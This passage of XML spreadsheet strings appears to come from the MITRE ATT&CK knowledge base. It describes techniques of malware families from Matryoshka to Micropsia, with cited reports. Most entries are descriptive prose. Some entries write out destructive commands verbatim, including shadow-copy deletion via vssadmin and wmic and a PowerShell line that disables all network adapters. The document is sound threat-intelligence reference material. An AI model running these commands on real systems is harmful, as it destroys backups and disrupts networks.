    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of stealing Outlook passwords.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) uses DNS for C2.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) uses reflective DLL injection to inject the malicious library and execute the RAT.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of keylogging.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) obfuscates API function names using a substitute cipher combined with Base64 encoding.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) can establish persistence by adding Registry Run keys.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) can establish persistence by adding a Scheduled Task named "Microsoft Boost Kernel Optimization".(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of performing screen captures.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. [Maze](https://attack.mitre.org/software/S0449) has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.(Citation: FireEye Maze May 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has disabled dynamic analysis and other security tools including IDA debugger, x32dbg, and OllyDbg.(Citation: McAfee Maze March 2020) It has also disabled Windows Defender's Real-Time Monitoring feature and attempted to disable endpoint protection services.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has forged POST strings with a random choice from a list of possibilities including "forum", "php", "view", etc. while making connection with the C2, hindering detection efforts.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has injected the malware DLL into a target process.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has used the “Wow64RevertWow64FsRedirection” function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.(Citation: McAfee Maze March 2020)	</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) operators have created scheduled tasks masquerading as "Windows Update Security", "Windows Update Security Patches", and "Google Chrome Security Update" designed to launch the ransomware.(Citation: Sophos Maze VM September 2020) </t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has delivered components for its ransomware attacks using MSI files, some of which have been executed from the command-line using &lt;code&gt;msiexec&lt;/code&gt;.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others.(Citation: McAfee Maze March 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has decrypted strings and other important information during the encryption process. [Maze](https://attack.mitre.org/software/S0449) also calls certain functions dynamically to hinder analysis.(Citation: McAfee Maze March 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has gathered all of the running system processes.(Citation: McAfee Maze March 2020)	</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has created a file named "startup_vrun.bat" in the Startup folder of a virtual machine to establish persistence.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) operators have used VirtualBox and a Windows 7 virtual machine to run the ransomware; the virtual machine's configuration file mapped the shared network drives of the target company, presumably so [Maze](https://attack.mitre.org/software/S0449) can encrypt files on the shared drives as well as the local machine.(Citation: Sophos Maze VM September 2020) </t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has created scheduled tasks using name variants such as "Windows Update Security", "Windows Update Security Patches", and "Google Chrome Security Update", to launch [Maze](https://attack.mitre.org/software/S0449) at a specific time.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has stopped SQL services to ensure it can encrypt any database.(Citation: Sophos Maze VM September 2020) </t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has checked the language of the infected system using the "GetUSerDefaultUILanguage" function.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has checked the language of the machine with function &lt;code&gt;GetUserDefaultUILanguage&lt;/code&gt; and terminated execution if the language matches with an entry in the predefined list.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has used the "WNetOpenEnumW", "WNetEnumResourceW”, “WNetCloseEnum” and “WNetAddConnection2W” functions to enumerate the network resources on the infected machine.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has issued a shutdown command on a victim machine that, upon reboot, will run the ransomware within a VM.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has communicated to hard-coded IP addresses via HTTP.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>The [Maze](https://attack.mitre.org/software/S0449) encryption process has used batch scripts with various commands.(Citation: FireEye Maze May 2020)(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020) </t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to send the compromised user's account name and hostname within a URL to C2.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to upload and download files to and from a compromised host.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has been downloaded as a file named lsass.exe, which matches the legitimate Windows file.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) uses a python-based payload.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to use base16 encoded strings in C2.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to identify the username and hostname on a compromised host.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to use HTTP in communication with C2.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to run commands on a compromised host.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) can enable &lt;code&gt;SeDebugPrivilege&lt;/code&gt; and adjust token privileges.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has changed user account passwords and logged users off the system.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used code signing certificates issued to fake companies to bypass security controls.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used the open-source library, Mbed Crypto, and generated AES keys to carry out the file encryption process.(Citation: IBM MegaCortex)(Citation: mbed-crypto)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used a Base64 key to decode its components.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) was used to kill endpoint security processes.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) can wipe deleted data from all drives using &lt;code&gt;cipher.exe&lt;/code&gt;.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) loads &lt;code&gt;injecthelper.dll&lt;/code&gt; into a newly created &lt;code&gt;rundll32.exe&lt;/code&gt; process.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) can parse the available drives and directories to determine which files to encrypt.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has deleted volume shadow copies using &lt;code&gt;vssadmin.exe&lt;/code&gt;.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has added entries to the Registry for ransom contact information.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>After escalating privileges, [MegaCortex](https://attack.mitre.org/software/S0576) calls &lt;code&gt;TerminateProcess()&lt;/code&gt;, &lt;code&gt;CreateRemoteThread&lt;/code&gt;, and other Win32 APIs.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used &lt;code&gt;rundll32.exe&lt;/code&gt; to load a DLL for file encryption.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) can stop and disable services on the system.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) has checked the number of CPUs in the system to avoid being run in a sandbox or emulator.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) has used &lt;code&gt;.cmd&lt;/code&gt; scripts on the victim's system.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can monitor the victim's browser for online banking sessions and display an overlay window to manipulate the session in the background.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can monitor content saved to the clipboard.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has been distributed through an AutoIt loader script.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has the ability to steal credentials from web browsers.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can use DLL hijacking to bypass security controls.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has the ability to download additional files to a compromised host.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has gained execution through victims opening malicious links.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can use MSI files with embedded VBScript for execution.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has been packed with VMProtect and Themida.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has been spread through malicious links embedded in e-mails.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can monitor the clipboard for cryptocurrency addresses and change the intended address to one controlled by the adversary.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can use VBS scripts to execute malicious DLLs.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) can enumerate all windows on the victim’s machine.(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455)'s C2 communication has been encrypted using OpenSSL.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has a function to hijack data from the clipboard by monitoring the contents of the clipboard and replacing the cryptocurrency wallet with the attacker's.(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has digitally signed executables using AVAST Software certificates.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has side-loaded its malicious DLL file.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has used YouTube to store and hide C&amp;C server domains.(Citation: ESET Casbaneiro Oct 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">Upon execution, [Metamorfo](https://attack.mitre.org/software/S0455) has unzipped itself after being downloaded to the system and has performed string decryption.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a function to kill processes associated with defenses and can prevent certain processes from launching.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has injected a malicious DLL into the Windows Media Player process (wmplayer.exe).(Citation: Medium Metamorfo Apr 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) can send the data it collects to the C2 server.(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has deleted itself from the system after execution.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has searched the Program Files directories for specific folders and has searched for strings related to its mutexes.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has displayed fake forms on top of banking sites to intercept credentials from victims.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has hidden its GUI using the ShowWindow() WINAPI call.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has a command to delete a Registry key it uses, &lt;code&gt;\Software\Microsoft\Internet Explorer\notes&lt;/code&gt;.(Citation: FireEye Metamorfo Apr 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used MSI files to download additional files to execute.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) includes payloads written in JavaScript.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a command to launch a keylogger and capture keystrokes on the victim’s machine.(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) requires the user to double-click the executable to run the malicious HTA file or to download a malicious installer.(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has disguised an MSI file as the Adobe Acrobat Reader Installer and has masqueraded payloads as OneDrive, WhatsApp, or Spotify, for example.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has written process names to the Registry, disabled IE browser features, deleted Registry keys, and changed the ExtendedUIHoverTime key.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used mshta.exe to execute a HTA payload.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used MsiExec.exe to automatically execute files.(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has used native WINAPI calls.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used raw TCP for C2.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has communicated with hosts over raw TCP on port 9999.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has encrypted payloads and strings.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has downloaded a zip file for execution on the system.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has performed process name checks and has monitored applications.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has configured persistence to the Registry ket &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run, Spotify =% APPDATA%\Spotify\Spotify.exe&lt;/code&gt; and used .LNK files in the startup folder to achieve persistence.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) can collect screenshots of the victim’s machine.(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) collects a list of installed antivirus software from the victim’s system.(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) had used AutoIt to load and execute the DLL payload.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has searched the compromised system for banking applications.(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used VMProtect to pack and protect files.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has been delivered to victims via emails with malicious HTML attachments.(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has encrypted C2 commands with AES-256.(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has collected the hostname and operating system version from the compromised host.(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has collected the username from the victim's machine.(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) uses JavaScript to get the system time.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a function that can watch the contents of the system clipboard for valid bitcoin addresses, which it then overwrites with the attacker's address.(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has used VBS code on victims’ systems.(Citation: FireEye Metamorfo Apr 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used HTTP for C2.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used &lt;code&gt;cmd.exe /c&lt;/code&gt; to execute files.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) has the ability to change the password of local users on compromised hosts and can log off users.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can use [Wevtutil](https://attack.mitre.org/software/S0645) to remove Security, System and Application Event Viewer logs.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can fill a victim's files and directories with zero-bytes in replacement of real content before deleting them.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can attempt to uninstall Kaspersky Antivirus or remove the Kaspersky license; it can also add all files and folders related to the attack to the Windows Defender exclusion list.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) will delete the folder containing malicious scripts if it detects the hostname as `PIS-APP`, `PIS-MOB`, `WSUSPROXY`, or `PIS-DB`.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can use group policy to push a scheduled task from the AD to all network machines.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can hide its console window upon execution to decrease its visibility to a victim.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) has the ability to download additional files for execution on the victim's machine.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can use `bcdedit` to delete different boot identifiers on a compromised host; it can also use `vssadmin.exe delete shadows /all /quiet` and `C:\\Windows\\system32\\wbem\\wmic.exe shadowcopy delete`.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can change both the desktop wallpaper and the lock screen image to a custom image.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) has been disguised as the Windows Power Efficiency Diagnostics report tool.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can use `WinAPI` to remove a victim machine from an Active Directory domain.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can use PowerShell commands to disable the network adapters on a victim machines.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can check if a specific process is running, such as Kaspersky's `avp.exe`.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) execution begins from a scheduled task named `Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeAll` and it creates a separate scheduled task called `mstask` to run the wiper only once at 23:55:00.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) has the ability to search for Kaspersky Antivirus on a victim's machine.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can disconnect all network adapters on a compromised host using `powershell -Command "Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }" &gt; NUL`.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) has the ability to discover the hostname of a compromised host.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can run `set.bat`, `update.bat`, `cache.bat`, `bcd.bat`, `msrun.bat`, and similar scripts.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can use `wmic.exe` as part of its effort to delete shadow copies.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a RAR archive based on collected files on the victim's machine.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) can perform microphone recording.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt).(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) can perform a recursive directory listing for all volume drives available on the victim's machine and can also fetch specific files by their paths.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a new hidden directory to store all components' outputs in a dedicated sub-folder for each.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) can download and execute an executable from the C2 server.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) has keylogging capabilities.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) obfuscates the configuration with a custom Base64 and XOR.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) takes screenshots every 90 seconds by calling the Gdi32.BitBlt API.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) searches for anti-virus software and firewall products installed on the victim’s machine using WMI.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a shortcut to maintain persistence.(Citation: Talos Micropsia June 2017)</t>
  </si>
  <si>
